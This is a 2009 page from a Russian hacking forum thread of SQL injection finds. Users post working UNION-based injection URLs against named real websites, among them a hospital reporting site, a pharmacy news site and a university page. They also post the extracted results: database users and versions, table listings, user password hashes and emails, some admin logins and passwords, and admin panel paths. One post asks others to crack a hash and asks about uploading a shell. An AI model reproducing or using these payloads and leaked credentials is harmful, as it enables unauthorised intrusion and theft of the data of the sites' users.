HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 968 из 1604 « Первая < 468868918958 964 965 966 967 968 969 970 971 972 978101810681468 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9671  
Старый 04.06.2009, 17:17
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://www.phcqa.org/reports/hospital/historical.php?id=390256&measure_id=-5001+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7

5.0.32-Debian_7etch8-log:dataphcqa@localhost:dataphcqa
PR 5
 
Ответить с цитированием

  #9672  
Старый 04.06.2009, 18:06
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию
http://www.provisor.com.ua/
Цитата:
http://www.provisor.com.ua/news.php?art=-4280+UNION+SELECT+0,1,2,3,4,5,6,CONCAT_WS(0x0b,use r(),dat abase(),version()),8,9+--+
provisor_webuser@localhost
provisor_main
5.0.77-community-log


Таблы огромным списоком
Цитата:
http://www.provisor.com.ua/news.php?art=-4280+UNION+SELECT+0,1,2,3,4,5,6,CONCAT_WS(0x0b,tab le _nam e,column_name),8,9+FROM+INFORMATION_SCHEMA.COLUMNS +--+
Юзеры форума
Цитата:
http://www.provisor.com.ua/news.php?art=-4280+UNION+SELECT+0,1,2,3,4,5,6,CONCAT_WS(0x0b,use r_passw ord,user_email),8,9+FROM+phpbb_users+--+
Очень огромная база юзерей правда захешеная, все на одной странице
Цитата:
http://www.provisor.com.ua/news.php?art=-4280+UNION+SELECT+0,1,2,3,4,5,6,CONCAT_WS(0x0b,pas s wd,email),8,9+FROM+users+--+
PR5

http://www.chaykafest.com/
Цитата:
http://www.chaykafest.com/news.php?news=-44+UNION+SELECT+0,1,concat_ws(0x0b,user(),database (),versio n()),3,4,5+--+
u_chaykafest@localhost
chaykafest
4.1.22


http://sommelier-news.com

Цитата:
http://sommelier-news.com/news.php?ch=id&id=-1014'+UNION+SELECT+0,concat_ws(0x0b,user(),versio n(),database()),2,3,4,5,6,7,8,9,10,11,12,13+%23&to _ch=all&type=2
vadim_anons@localhost
5.0.22
vadim_anons


Юзеры списком
Цитата:
http://sommelier-news.com/news.php?ch=id&id=-1014'+UNION+SELECT+0,concat_ws(0x0b,email,ps wd),2,3,4,5,6,7,8,9,10,11,12,13+FROM+users_users+% 23&to_ch=all&type=2
Юзеры списком 2(админы)
http://sommelier-news.com/news.php?ch=id&id=-1014'+UNION+SELECT+0,concat_ws(0x0b,passw,login,ad min),2,3,4,5,6,7,8,9,10,11,12,13+FROM+auth_users+% 23&to_ch=all&type=2


Админка
Цитата:
http://sommelier-news.com/админ на англ/
Логин: ТакойЖеКакИПас
Пасс: 330

"админ на англ" - защита от Турков ))
Последний раз редактировалось udman; 04.06.2009 в 18:37..
 
Ответить с цитированием

  #9673  
Старый 04.06.2009, 18:49
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
PR 5, ТИЦ 475
http://www.model-357.ru/show.php?id_a=64+and+substring(version(),1,1)=4

http://webmvc.com/show/show.php?sec=10&art=-3+union+select+1,version(),3,4
4.0.24_Debian-10sarge1-log

PR 4, ТИЦ 950
Последний раз редактировалось AlexSatter; 04.06.2009 в 19:08..
 
Ответить с цитированием

  #9674  
Старый 04.06.2009, 19:16
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию
http://www.oissp.org/news/news_full.php?id=-1+union+select+1,2,3,concat(table_name),5,6+from+i nformation_schema.tables+--+

http://consumerlady.com/news_full.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9+from+information_schema.tables+--+

http://ford.renessans.ru/news_full.php?id=-1+union+select+1,2,concat_ws(0x3a3a,username,pass) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users +/*+
admin::$1$WE$fFPL1qCgvP8kQ5xlKUW3R/

http://prsnso.siberia.net/index.php?rub=page&id=-6+union+select+1,concat_Ws(0x3a3a,login,pass)+from +users+limit+2,1+--+
soran::821936
Админку не нашёл(

http://turakovo.ru/news_full.php?nr=1&id=-1+union+select+name+from+user+--+
Администратор - вывод в title

http://www.metalside.pl/news/news_full.php?id=1+union+select+concat(table_name) +from+information_schema.tables+limit+34,10+--+
phpbb_users
Последний раз редактировалось DezMond™; 04.06.2009 в 19:39..
 
Ответить с цитированием

  #9675  
Старый 04.06.2009, 20:00
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию
<<Торговое обoрудования>>
Код:
http://kvazar.ru/price_new.htm?group_id=-1+union+all+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7--+
Код:
http://kvazar.ru/admin/ - бейсик авторизация
5.0.51a-community:*:db_kvazar1:*:kvazar1@localhost:*:redha t-linux-gnu
 
Ответить с цитированием

  #9676  
Старый 04.06.2009, 20:38
ANUBI$
Участник форума
Регистрация: 16.01.2009
Сообщений: 115
Провел на форуме:
3160458

Репутация: 279
Отправить сообщение для ANUBI$ с помощью ICQ
По умолчанию
ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,group_concat(table_name),3,4,5,6 ,7,8,9+from+information_schema.tables

ttp://www.sunriseindustries.ie/products.php?id=-13+union+select+1,coNCAT_ws(chAR(42,32,42),user(), database(),version()),3,4,5,6,7,8,9
dbsun@localhost* *sunriseindustries* *5.0.45
 
Ответить с цитированием

  #9677  
Старый 04.06.2009, 21:11
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
Вот SQl-ing, в принципе популярный TOP рейтинг wap сатов

http://vloge.ru/outtop.php?uid=-238+union+select+1--
superadmin --------------------------------
http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+I NFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x73757 0657261646d696e

(ID:login:md5(pass))
1:XuiVamVrot:50bcb34ab2fc85e6738ec9e6625f2b3d

ЗЫ: Логин меня убил , кто сможет расшифровать пароль, скинте в ЛС пожалуйсто
--------------------------------------
users---------------------------------
http://vloge.ru/outtop.php?uid=-238+union+select+TABLE_NAME+from+INFORMATION_SCHEM A.TABLES+limit+30,1--
Таблицы
http://vloge.ru/outtop.php?uid=238+union+select+COLUMN_NAME+from+I NFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=0x75736 57273--
(uid site_name link email info razdel date pass type(9) typeStat vip

Юзеры: крутим лимитом

http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+11,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+40,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+90,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass,email)+from+users+limit+100,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass,email)+from+users+limit+160,1--
http://vloge.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pas s,email)+from+users+where+uid=254--

можно ли туда шел залить?
Последний раз редактировалось SeNaP; 04.06.2009 в 21:48..
 
Ответить с цитированием

  #9678  
Старый 04.06.2009, 21:47
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
PR 5, edu

PHP код:
http://info.phys.unm.edu/people/index.phtml?pid=151'+union+select+1,2,3,4,5,6,7/* 
User: panda@info.phys.unm.edu
Version: 4.1.22
Dbname: panda
 
Ответить с цитированием

  #9679  
Старый 04.06.2009, 21:57
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://www.mixomat-recordings.de/news.php?action=read&id=1'+union+select+1,concat_w s(0x3a,version(),database(),user()),3,4+--+

4.0.25-Max-log:v135343:v135343@localhost
 
Ответить с цитированием

  #9680  
Старый 04.06.2009, 23:59
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
Провел на форуме:
3193846

Репутация: 242
По умолчанию
DATABASE - web147db1
VERSION - 5.0.67
USER - web147u1@localhost
@@VERSION_COMPILE_OS - suse-linux-gnu

вот и таблица :

http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,table_name,7,8 ,9,10+from+information_schema.tables+limit+24,1--+

вот и юзеры

http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20 ,pass,name),7,8,9,10+from+user--+

http://mymakler.ge/index.php?id=-735%27+and+0+union+select+1,2,3,4,5,concat_ws(0x20 ,pass,name),7,8,9,10+from+user+limit+6,3--+

пасс - kikula
юзер - devi
но они не подходят к админке там их переберать надоело их там тьма, может кому и повезет

http://mymakler.ge/admin/
 
Ответить с цитированием
Ответ
Страница 968 из 1604 « Первая < 468868918958 964 965 966 967 968 969 970 971 972 978101810681468 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ